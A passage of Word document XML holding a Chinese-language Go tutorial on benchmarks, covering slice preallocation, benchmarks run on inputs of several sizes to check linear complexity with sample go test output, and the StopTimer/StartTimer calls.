    <w:p w14:paraId="76643816" w14:textId="7DC8AA09" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="163019D4" w14:textId="3CB8C4D6" w:rsidR="00387E29" w:rsidRDefault="00932ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Generate </w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分配的内存是</w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GenerateWithCap </w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倍，</w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>设置了切片容量，内存只分配一次，</w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不设置切片容量，内存分配了</w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 40 </w:t>
      </w:r>
      <w:r w:rsidRPr="00932ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F3A28" w14:textId="17641758" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E03706" w14:textId="49875472" w:rsidR="00932ECF" w:rsidRDefault="00FF6586" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试不同输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419730D5" w14:textId="7ABA651F" w:rsidR="00FF6586" w:rsidRDefault="00FF6586" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC65843" w14:textId="54B4815D" w:rsidR="00D2550D" w:rsidRDefault="00D2550D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同的函数复杂度不同，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O(n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">O(n^2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark </w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证复杂度一个简单的方式，是构造不同的输入。对刚才的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark </w:t>
      </w:r>
      <w:r w:rsidRPr="00D2550D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>稍作改造，便能够达到目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA188D" w14:textId="2A1CD2AF" w:rsidR="00D2550D" w:rsidRDefault="00D2550D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F875C7" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// generate_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCB48B5" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B11381" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34462E34" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036761C7" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"math/rand"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301EBD73" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"testing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656BA6C" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"time"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683A8C4F" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925B30E" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2652D955" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func generate(n int) []int {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53686306" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rand.Seed(time.Now().UnixNano())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ABD284" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nums := make([]int, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B7FD06" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i := 0; i &lt; n; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572BEAC" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>nums = append(nums, rand.Int())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09B11D" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC7D46" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return nums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BEDB2A" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EADA50" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func benchmarkGenerate(i int, b *testing.B) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5F2E0" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for n := 0; n &lt; b.N; n++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12033D9D" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>generate(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F7964" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0C47F" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F2DCE" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECD005D" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func BenchmarkGenerate1000(b *testing.B)    { </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>benchmarkGenerate(1000, b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993E965" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func BenchmarkGenerate10000(b *testing.B)   { </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>benchmarkGenerate(10000, b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6D9A0A" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func BenchmarkGenerate100000(b *testing.B)  { </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>benchmarkGenerate(100000, b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB47FC" w14:textId="69BB3D02" w:rsidR="00D2550D" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func BenchmarkGenerate1000000(b *testing.B) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>benchmarkGenerate(1000000, b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E3DA5F" w14:textId="683D44AD" w:rsidR="00D2550D" w:rsidRDefault="00D2550D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11809CB5" w14:textId="7A8B148A" w:rsidR="00D2550D" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里，我们实现一个辅助函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmarkGenerate </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许传入参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并构造了</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个不同输入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用例。运行结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78789B6B" w14:textId="45EF5D18" w:rsidR="00D2550D" w:rsidRDefault="00D2550D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA7C98C" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">$ go test -bench .                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBDD37" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>goos: darwin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3992939F" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>goarch: amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736125A" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pkg: example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AED80" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkGenerate1000-8            34048             34643 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21260312" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkGenerate10000-8            4070            295642 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A508C87" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkGenerate100000-8            403           3230415 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2BE4DC" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkGenerate1000000-8            39          32083701 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F78492" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRPr="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD33A10" w14:textId="2FA594CE" w:rsidR="00D2550D" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ok      example 6.597s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D79D56" w14:textId="77777777" w:rsidR="00D2550D" w:rsidRDefault="00D2550D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB04E8E" w14:textId="6CB6E9C2" w:rsidR="00FF6586" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过测试结果可以发现，输入变为原来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倍，函数每次调用的时长也差不多是原来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倍，这说明复杂度是线性的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4032B0F9" w14:textId="73BC1B7E" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1277A537" w14:textId="4EE384FD" w:rsidR="00EE3FC3" w:rsidRDefault="00423D0B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定开始的测量步骤，避免函数其他部分影响测量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED3E211" w14:textId="72DB3465" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CCF6C8" w14:textId="77777777" w:rsidR="00F021BC" w:rsidRDefault="00F021BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有一种情况，每次函数调用前后需要一些准备工作和清理工作，我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F021BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">StopTimer </w:t>
      </w:r>
      <w:r w:rsidRPr="00F021BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>暂停计时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F021BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">StartTimer </w:t>
      </w:r>
      <w:r w:rsidRPr="00F021BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开始计时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162404BD" w14:textId="77777777" w:rsidR="00F021BC" w:rsidRDefault="00F021BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E760A7D" w14:textId="7ED69555" w:rsidR="00423D0B" w:rsidRDefault="00F021BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，如果测试一个冒泡函数的性能，每次调用冒泡函数前，需要随机生成一个数字序列，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这是非常耗时的操作，这种场景下，就需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StopTimer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StartTimer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>避免将这部分时间计算在内。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8C24B" w14:textId="5B32B9D8" w:rsidR="00423D0B" w:rsidRDefault="00423D0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6556C587" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// sort_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4C234" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB2FE2" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0568FFFE" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283175BD" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"math/rand"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7E8B8F" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"testing"</w:t>
      </w:r>
    </w:p>
